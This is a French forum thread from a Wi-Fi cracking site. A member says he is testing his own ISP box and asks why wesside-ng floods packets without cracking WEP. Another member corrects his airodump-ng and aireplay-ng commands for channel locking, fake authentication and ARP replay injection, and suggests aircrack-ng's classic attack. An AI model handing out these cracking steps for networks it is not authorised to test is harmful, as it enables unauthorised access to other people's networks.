Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 01-01-2013 19:49:49

flatounet
Membre V.I.P.

pb test crack wessid (pas de crack que du flood)

re bonjour à tous ,
apparament , il y aurai eu une maj de mon modem ;
je n'arrive pu à le cracker de moi meme (en commande de ligne : changement de chanel constament , et disparition de ma station au bout de quelque minutes )

j'ai vue un commentaire parlant de wessid ,
j'ai dont testé mon reseau via cette outils ,
cependant le crack semble bien ce lancer

je part faire autre chose ;
au bout de 3h :

[13:37:27] | Attacking [NUMERICABLE-XXXX] WEP - FLOOD - 126441 IVs rate 15 [103 PPS out] len 332

si je comprend bien là il recupere des ivs , a coup de flood , c marqué en gros ;

cependant si je me reporte au "site" aircrack-ng sur ce programe ,
ce dernier est censé tenté un crack/brute force tout les 10 000 ivs

hors j'ai beau regarder pas de tentative de crack tout les 10000....

quelqu'un aurai une idée ?

Dernière modification par flatounet (01-01-2013 19:51:30)

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 01-01-2013 21:46:47

antares145
Membre d'honneur
Site Web

Re : pb test crack wessid (pas de crack que du flood)

flatounet a écrit :

je n'arrive pu à le cracker de moi meme (en commande de ligne : changement de chanel constament , et disparition de ma station au bout de quelque minutes )

Je ne demande qu'à te croire, mais j'ai quand même un doute wink
- donne-nous la liste des commandes que tu tapes
- vérifie si le canal est configuré comme "auto" dans l'interface de gestion de la box
- le canal change(rait) à quel moment ? Pendant le scan passif (airodump-ng), ou pendant l'injection ?

flatounet a écrit :

au bout de 3h :

[13:37:27] | Attacking [NUMERICABLE-XXXX] WEP - FLOOD - 126441 IVs rate 15 [103 PPS out] len 332

si je comprend bien là il recupere des ivs , a coup de flood , c marqué en gros ;

Ca m'a l'air logique, ça correspond à l'étape 6 d'après la documentation officielle
--> wesside-ng [aircrack-ng.org]
Le rate m'a l'air un peu bas, mais rien de grave.

Tu utilises quelle version de wesside-ng exactement ? Celle intégrée dans BackTrack (quelle version de BT ?), ou bien la version svn compilée depuis les sources récentes ?

Et surtout, comment tu sais que...
1) Il a plus de 10k IV's ?
2) Il ne lance pas d'attaque ?

#3 02-01-2013 06:03:19

flatounet
Membre V.I.P.

iwconfig
airmon-ng start wlan0
airodump-ng --encrypt wep wlan0
XX:XX:XX:XX:26:XX  -64        3        1    0  11  54e  WEP  WEP         NUMERICABLE-XXXX                            
 XX:XX:XX:XX:26:XX  XX:XX:XX:XX:05:XX

enregistrement des ivs

airodump-ng -w XXXX-02  --bssid XX:XX:XX:XX:26:XX  mon0

test autent

aireplay-ng -1 0 -e NUMERICABLE-xxxx -a XX:XX:XX:XX:26:XX -b XX:XX:XX:XX:26:XX -h XX:XX:XX:XX:05:XX mon0

mon replay :

aireplay-ng -3 -e NUMERICABLE-xxxx -a XX:XX:XX:XX:26:XX -b XX:XX:XX:XX:26:XX -h XX:XX:XX:XX:05:XX -x 600 -r xxxx-02.cap mon0

à ce moment là un nouveau client apparait :

XX:XX:XX:XX:26:XX XX:XX:XX:XX:05:XX 
XX:XX:XX:XX:26:XX  XX:XX:XX:03:XX:XX

<<----

et j'ai un message d'erreur d'aireplay -3
il m'indique tout le temp client attendu sur le chanel 5 et est sur le 3
je relance client attendu sur le chanel 3 et est sur le 11 ....

en general à la 2eme tentative ou à la 3eme , la station disparait ....

je rehitere avec le nouveau client :

aireplay-ng -3 -e NUMERICABLE-xxxx -a XX:XX:XX:[u]03[/u]:XX:XX -b XX:XX:XX:[u]03[/u]:xx:XX -h XX:XX:XX:XX:05:XX -x 600 -r xxxx-02.cap mon0

meme tarif

j'ai deja testé mon reseau il à a 1 mois a vue de nez , et j'avais mis 10m a tout cassé

là avec wessid ,il arrive bien à chopé les IVS mais ne depassant pas les 10/S (lancer hier soir 18h ,là a
6h il est à 155k , et c'est pas percé)

j'utilise la version integré de wessid (dans bt5r3 )
j'arrive pas a avoir le net sous bt5 via vmware , alors que tout marchai au part avant ....

Dernière modification par flatounet (02-01-2013 06:04:49)

#4 02-01-2013 14:41:50

antares145
Membre d'honneur
Site Web

Règle de base : toujours fixer le canal lors de l'écoute avec airodump-ng smile

Tu lances une première fois airodump-ng sans aucune option pour "localiser" ton réseau-cible, puis une fois que tu vois sur quel réseau il se trouve, tu interromps le scan et tu le relances avec les options spécifiques.
Si ton réseau est sur le canal 11, ta commande devient alors :

airodump-ng -w XXXX-02 -c 11 --bssid XX:XX:XX:XX:26:XX  mon0

Pour aireplay-ng -3, les options "-a" et "-b" existent toutes les deux mais n'ont pas le même sens (et ne doivent pas être utilisées ensemble). Oui, je sais, c'est idiot. Le "-a" est utilisé pour la fakeauth (-1), le "-b" pour l'injection (-3). Tes commandes deviennent :

aireplay-ng -1 0 -e NUMERICABLE-xxxx -a XX:XX:XX:XX:26:XX -b XX:XX:XX:XX:26:XX -h XX:XX:XX:XX:05:XX mon0
aireplay-ng -3 -e NUMERICABLE-xxxx -b XX:XX:XX:03:xx:XX -h XX:XX:XX:XX:05:XX -x 600 -r xxxx-02.cap mon0

(Note que si tu peux t'associer avec ton adresse MAC réelle, tu n'as pas besoin du "-h" non plus). De même, spécifier le BSSID suffit à identifier le réseu, tu n'es pas obligé de donner son SSID (-e) en plus. Tes commandes pourraient donc peut-être se simplifier en :

aireplay-ng -1 0 -a XX:XX:XX:XX:26:XX mon0
aireplay-ng -3 --b XX:XX:XX:03:xx:XX -x 600 -r xxxx-02.cap mon0
# Peut-être même que ta seconde commande peut se simplifier en :
#aireplay-ng -3 --b XX:XX:XX:03:xx:XX mon0

Au cas où, je rappelle que chaque commande tourne dans sa propre fenêtre de terminal :
- une console pour airodump-ng (et toutes ses options, dont le -c)
- une console pour aireplay-ng -1
- une console pour aireplay-ng -3
- et une dernière pour aircrack-ng, au moment du crack

Pour le crack justement, il ne faut pas oublier qu'on parle ici d'une attaque statistique, qui n'est donc pas garantie (même si ses chances de réussite sont élevées). En particulier, l'attaque PTW (rapide et par défaut) se prend parfois les pieds dans le tapis si les données ne sont pas assez "propres" à son goût. Il vaut alors mieux recommencer avec des données saines, ou lancer une attaque classique (option "-K" de aircrack-ng) sur le même fichier de capture.
Cette attaque classique est plus lente et nécessite + de données, mais elle est aussi plus robuste smile

#5 02-01-2013 18:25:19

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Je me suis permis d'éditer ton message antérieur Flatounet; c'est plus facile pour le lecteur si tu utilises la balise code pour bien mettre en exergue les commandes et messages d'erreurs. wink

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.023 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]